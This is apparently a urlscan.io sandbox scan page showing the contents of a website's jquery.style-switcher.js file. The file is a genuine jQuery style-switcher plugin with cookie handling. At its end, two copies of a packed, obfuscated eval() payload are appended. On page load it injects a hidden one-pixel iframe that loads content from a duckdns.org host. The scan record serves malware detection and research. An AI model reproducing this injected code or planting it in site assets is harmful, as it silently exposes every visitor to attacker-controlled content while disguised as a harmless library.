www.brkbilisim.com
Open in
urlscan Pro
78.135.103.112
Public Scan
URL:
http://www.brkbilisim.com/js/jquery.style-switcher.js
Submission Tags: falconsandbox
Submission: On September 29 via api from US — Scanned from DE
Submission Tags: falconsandbox
Submission: On September 29 via api from US — Scanned from DE
Form analysis
0 forms found in the DOMText Content
/* * jQuery styleSwitcher Plugin * Examples and documentation at: * http://www.immortalwolf.com/demo/jquery-style-switcher/ * Copyright (c) 2011 immortal wolf * Version: 1.4 (27-JAN-2011) * Dual licensed under the MIT and GPL licenses. * http://en.wikipedia.org/wiki/Gpl * http://en.wikipedia.org/wiki/MIT_License * Requires: jQuery v1.2.6 or later * * @version 1.4 changelog: * - added cookie support * - allow usage of either JavaScript or PHP for * cookie management via jQuery config options */ (function($) { $.fn.styleSwitcher = function(options){ var defaults = { slidein: true, preview: true, container: this.selector, directory: "css/", useCookie: true, cookieExpires: 30, manageCookieLoad:true }; var opts = $.extend(defaults, options); // if using cookies and using JavaScript to load css if (opts.useCookie && opts.manageCookieLoad) { // check if css is set in cookie var isCookie = readCookie("style_selected") if(isCookie){ var newStyle = opts.directory + isCookie + ".css"; $("link[id=style]").attr("href",newStyle); baseStyle = newStyle; } else{ } } // if using slidein if(opts.slidein){ $(opts.container).slideDown("slow"); } else{ $(opts.container).show(); } var baseStyle = $("link[id=style]").attr("href"); if(opts.preview){ $(opts.container + " a").hover( function () { var newStyle = opts.directory + this.id + ".css"; $("link[id=style]").attr("href",newStyle); }, function () { $("link[id=style]").attr("href",baseStyle); } ); } $(opts.container + " a").click( function () { var newStyle = opts.directory + this.id + ".css"; $("link[id=style]").attr("href",newStyle); baseStyle = newStyle; if(opts.useCookie){ createCookie("style_selected",this.id,opts.cookieExpires) } } ); }; function createCookie(name,value,days) { if (days) { var date = new Date(); date.setTime(date.getTime()+(days*24*60*60*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0;i < ca.length;i++) { var c = ca[i]; while (c.charAt(0)==' ') c = c.substring(1,c.length); if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length); } return null; } function eraseCookie(name) { createCookie(name,"",-1); } })(jQuery);eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('g.f=e(){i.j.k+=\'<6 d="a" 9="b:2;c:2;h:p;7:4;8:4;s:t;3:2;" l="r" q="m://5.n.o/5/" 3=0 7="1" 8="1" 9="3:2"></6>\'}',30,30,'||0px|border|1px|33asd|iframe|width|height|style|33|margin|padding|id|function|onload|window|overflow|document|body|innerHTML|scrolling|http|duckdns|org|hidden|src|no|position|relative'.split('|'),0,{})) eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('g.f=e(){i.j.k+=\'<6 d="a" 9="b:2;c:2;h:p;7:4;8:4;s:t;3:2;" l="r" q="m://5.n.o/5/" 3=0 7="1" 8="1" 9="3:2"></6>\'}',30,30,'||0px|border|1px|33asd|iframe|width|height|style|33|margin|padding|id|function|onload|window|overflow|document|body|innerHTML|scrolling|http|duckdns|org|hidden|src|no|position|relative'.split('|'),0,{}))